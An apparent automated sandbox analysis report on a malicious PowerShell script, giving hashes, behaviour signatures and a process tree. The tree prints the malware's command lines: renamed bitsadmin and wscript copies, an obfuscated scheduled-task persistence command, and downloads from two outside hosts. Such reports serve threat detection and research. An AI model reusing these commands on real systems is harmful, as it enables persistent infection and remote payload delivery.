Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
18-06-2024 12:46
Static task
static1
Behavioral task
behavioral1
Sample
bc01ff54189a4d4014484b181624dbeb_JaffaCakes118.ps1
Resource
win7-20240220-en
General
-
Target
bc01ff54189a4d4014484b181624dbeb_JaffaCakes118.ps1
-
Size
116KB
-
MD5
bc01ff54189a4d4014484b181624dbeb
-
SHA1
3ec09b8075462565e158df0e50fb2faf8628e792
-
SHA256
c6107c4569196a4c240da6ab73e259556e39f68a7d83330c34550ac8a43f35d9
-
SHA512
27b42bbd5bf403b8c18a0828a4a1c26a051ae6e150e66ddd2b1afa16d4ed4cae35aebe5792ecc8aead27d8b23da759c5babf8a1936185b684086662734df41f1
-
SSDEEP
3072:7ZiyX09E8J3fWruXqnhi89T/H5GPuffVN5LIdW:7zX09E8FfWruXqnhi89T/ZGPwdN5LIdW
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation FeamFbE.exe -
Executes dropped EXE 4 IoCs
pid Process 452 FeamFbE.exe 3476 CCJHbh.exe 644 CCJHbh.exe 736 CCJHbh.exe -
pid Process 1168 powershell.exe 3304 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3164 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1168 powershell.exe 1168 powershell.exe 1168 powershell.exe 3304 powershell.exe 3304 powershell.exe 3304 powershell.exe 3304 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1168 powershell.exe Token: SeDebugPrivilege 3304 powershell.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 1168 wrote to memory of 2592 1168 powershell.exe 86 PID 1168 wrote to memory of 2592 1168 powershell.exe 86 PID 1168 wrote to memory of 2404 1168 powershell.exe 87 PID 1168 wrote to memory of 2404 1168 powershell.exe 87 PID 1168 wrote to memory of 3600 1168 powershell.exe 88 PID 1168 wrote to memory of 3600 1168 powershell.exe 88 PID 1168 wrote to memory of 4752 1168 powershell.exe 89 PID 1168 wrote to memory of 4752 1168 powershell.exe 89 PID 4752 wrote to memory of 3164 4752 cmd.exe 91 PID 4752 wrote to memory of 3164 4752 cmd.exe 91 PID 452 wrote to memory of 3304 452 FeamFbE.exe 97 PID 452 wrote to memory of 3304 452 FeamFbE.exe 97 PID 452 wrote to memory of 3304 452 FeamFbE.exe 97 PID 3304 wrote to memory of 1932 3304 powershell.exe 99 PID 3304 wrote to memory of 1932 3304 powershell.exe 99 PID 3304 wrote to memory of 1932 3304 powershell.exe 99 PID 3304 wrote to memory of 4312 3304 powershell.exe 101 PID 3304 wrote to memory of 4312 3304 powershell.exe 101 PID 3304 wrote to memory of 4312 3304 powershell.exe 101 PID 3304 wrote to memory of 3472 3304 powershell.exe 103 PID 3304 wrote to memory of 3472 3304 powershell.exe 103 PID 3304 wrote to memory of 3472 3304 powershell.exe 103 PID 4312 wrote to memory of 3476 4312 cmd.exe 105 PID 4312 wrote to memory of 3476 4312 cmd.exe 105 PID 4312 wrote to memory of 3476 4312 cmd.exe 105 PID 3472 wrote to memory of 644 3472 cmd.exe 107 PID 3472 wrote to memory of 644 3472 cmd.exe 107 PID 3472 wrote to memory of 644 3472 cmd.exe 107 PID 3304 wrote to memory of 2532 3304 powershell.exe 108 PID 3304 wrote to memory of 2532 3304 powershell.exe 108 PID 3304 wrote to memory of 2532 3304 powershell.exe 108 PID 2532 wrote to memory of 736 2532 cmd.exe 110 PID 2532 wrote to memory of 736 2532 cmd.exe 110 PID 2532 wrote to memory of 736 2532 cmd.exe 110 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\bc01ff54189a4d4014484b181624dbeb_JaffaCakes118.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "/c copy /Z c:\Windows\SysWOW64\bitsadmin.exe CCJHbh.exe"2⤵PID:2592
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "/c copy /Z c:\Windows\SysWOW64\wscript.exe FeamFbE.exe"2⤵PID:2404
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /FO CSV /v2⤵PID:3600
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /C schtasks /F /%windir:~0,1%reate /sc minute /mo 3 /TN "S0ZAmwlvONd" /ST 07:00 /TR "c:\users\Admin\AppData\Roaming\\ZAmwlvONd\FeamFbE.exe /E:vbscript c:\users\Admin\AppData\Roaming\\ZAmwlvONd\OZMUBhNl.tmp"2⤵
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\system32\schtasks.exeschtasks /F /Create /sc minute /mo 3 /TN "S0ZAmwlvONd" /ST 07:00 /TR "c:\users\Admin\AppData\Roaming\\ZAmwlvONd\FeamFbE.exe /E:vbscript c:\users\Admin\AppData\Roaming\\ZAmwlvONd\OZMUBhNl.tmp"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3164
-
-
-
\??\c:\users\Admin\AppData\Roaming\ZAmwlvONd\FeamFbE.exec:\users\Admin\AppData\Roaming\\ZAmwlvONd\FeamFbE.exe /E:vbscript c:\users\Admin\AppData\Roaming\\ZAmwlvONd\OZMUBhNl.tmp1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file OZMUBhNl.ps12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\SysWOW64\getmac.exe"C:\Windows\system32\getmac.exe" /fo table3⤵PID:1932
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exe /reset3⤵
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exeC:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exe /reset4⤵
- Executes dropped EXE
PID:3476
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exe /transfer umlAMVOF /%windir:~6,1%ownload /priority FOREGROUND "https://neawsd.eu/topic//main.php?ch=1&i=39c26e89673d0a797abaac36356654c2" C:\users\Admin\AppData\Roaming\ZAmwlvONd\0_System.log3⤵
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exeC:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exe /transfer umlAMVOF /download /priority FOREGROUND "https://neawsd.eu/topic//main.php?ch=1&i=39c26e89673d0a797abaac36356654c2" C:\users\Admin\AppData\Roaming\ZAmwlvONd\0_System.log4⤵
- Executes dropped EXE
PID:644
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exe /transfer PxlBSCdc /%windir:~6,1%ownload /priority FOREGROUND "https://pivpot.eu/topic//main.php?ch=1&i=39c26e89673d0a797abaac36356654c2" C:\users\Admin\AppData\Roaming\ZAmwlvONd\1_System.log3⤵
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exeC:\users\Admin\AppData\Roaming\ZAmwlvONd\CCJHbh.exe /transfer PxlBSCdc /download /priority FOREGROUND "https://pivpot.eu/topic//main.php?ch=1&i=39c26e89673d0a797abaac36356654c2" C:\users\Admin\AppData\Roaming\ZAmwlvONd\1_System.log4⤵
- Executes dropped EXE
PID:736
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
182KB
MD5f57a03fa0e654b393bb078d1c60695f3
SHA11ced6636bd2462c0f1b64775e1981d22ae57af0b
SHA256c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c
SHA5127e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a
-
Filesize
144KB
MD5ff00e0480075b095948000bdc66e81f0
SHA1c2326cc50a739d3bc512bb65a24d42f1cde745c9
SHA2568c767077bb410f95b1db237b31f4f6e1512c78c1f0120de3f215b501f6d1c7ea
SHA5123a38e62dcb925411bc037335e46dfdd895c12a52ac43c47ef38db42d41d8358dfc2b1081a361367911d60ec5a3350ca734cf70ad57b21d39b23cfdec35b0aced
-
Filesize
1KB
MD5f1e9f66e42ff552becace11f193e2291
SHA18d1b70937f252f4dc232746c9caac281daeadb66
SHA256d763d50ccd02dc7e999767e628cb4511475486685d8c0832e474c450c8eb62c7
SHA512946046a64433a1b60030e8b7bc358e9b25567b0583a553887f75b5d5eea18db581d08ad2631fdf326d6bc7a468158b5863b9c4ac73e32345b50f586b43ed435f
-
Filesize
172KB
MD553886a292f2b5df5dd3e3bc5ddc685e5
SHA1251cdb78aaac399be30fe7ac5fbac2aedcc1dd40
SHA256a733ae00f7bff9d41f57119abbae3b6fd447f86e260657373dad40cced1bddc1
SHA512b80a86abcd02f2e346612fac502b366e9dea7c9d069a474f0fa9c77b0fd16243649eb3469287d707664008d3a216058af2694735afb53cbd27f205c75d97e435
-
Filesize
1KB
MD568d2f04da656649d327ad9f6d01caf1d
SHA15c8adf96fbf3b2ed90ef0e69cfb96bfd9b8b2cea
SHA256d749e0d96da5ed0dbc144cad503bc38adf8724231094fa0745a407b2755593fa
SHA5120968b21c8dcf2beefef2b11cc4ae8df9da484b106c01cf2a379f8dbf5a393704d6a30bf42efd48799a3b7a453653bd20496cf73059a697b1eb6f51efec246721
-
Filesize
1KB
MD5252934c6bc0783210726c084905d451e
SHA1b8ed2ef3eafa2e2400fd66828ed37ba7c9242fe5
SHA2564c156fcc59b9a6e18a98381cba9d10023b93c1bc394866629983aed1498c28d3
SHA5128e1c19087a36b65dcfced8f8a4b9075436ccd2828bb9755d9e0938d9bd0afcc3f1d4648de0318131006d1a25ceb8c416965dae2509eaebc29f24e77aa3aa3b12